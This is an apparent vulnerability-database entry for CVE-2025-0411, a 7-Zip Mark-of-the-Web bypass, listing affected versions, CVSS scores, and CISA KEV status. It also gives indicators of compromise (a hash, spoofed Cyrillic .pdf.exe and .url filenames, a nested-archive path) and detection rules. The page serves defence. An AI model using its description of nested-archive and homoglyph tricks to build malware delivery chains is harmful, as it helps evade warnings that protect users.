cbcvebase.
CVE-2025-0411
published 2025-01-25

CVE-2025-0411: 7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected…

PriorityP181high7CVSS 3.1
AVLACHPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-02-27
Exploited in the wild
EPSS
67.07%
99.2th percentile
7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user. Was ZDI-CAN-25456.

Affected

5 ranges
VendorProductVersion rangeFixed in
7-zip7-zip< 24.0924.09
7-zip7-zip
7-zipp7zip>= 0 < 16.02+transitional.116.02+transitional.1
debian7zip
debianp7zip

Detection & IOCsextracted from sources · hover to see the quote

hashba74ecae43adc78efaee227a0d7170829b9036e5e7f602cf38f32715efa51826
filenameПлатежное Поручение в iнозеной валюте та сопроводiтельни документи вiд 23.09.2024p.url
filenameПлатежное Поручение в iнозеной валюте.pdf.exe
pathpoc.outer.zip\poc.inner.zip
bytes
\x37\x7A\xBC\xAF\x27\x1C
  • Detect MoTW bypass via double-nested archives: flag files extracted from an archive-within-an-archive (e.g., outer.zip/inner.zip/payload) that are missing a Zone.Identifier ADS with ZoneId=3, especially when the outer archive carries MoTW.
  • Hunt for executables or scripts dropped without a Zone.Identifier ADS (missing MoTW) that originate from a double-encapsulated archive extraction by 7-Zip versions prior to 24.09.
  • Detect homoglyph-based filename spoofing: look for filenames or domains containing Cyrillic characters (e.g., Cyrillic 'Es' U+0441) mixed with Latin characters, particularly in archive contents or email attachments, to identify extension-spoofing attempts.
  • Flag .url files with spoofed ZIP archive icons extracted from nested 7-Zip archives as high-risk; these are used to trick users into executing SmokeLoader payloads without MoTW warnings.
  • Detect double-extension executables (e.g., .pdf.exe) dropped from nested archives as an indicator of CVE-2025-0411 exploitation delivering SmokeLoader.
  • ·The bypass works regardless of the archive format used for the outer or inner archive — it is not limited to .zip or .7z containers.
  • ·MoTW propagation failure means downstream Windows security controls (SmartScreen reputation/signature checks and Office Protected View macro blocking) will not trigger on extracted payloads.

CVSS provenance

nvdv3.17.0HIGHCVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv3.07.0HIGHCVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
osv7.0HIGH
vulncheck7.0HIGH
cisa7.0HIGH
vendor_debian7.0LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.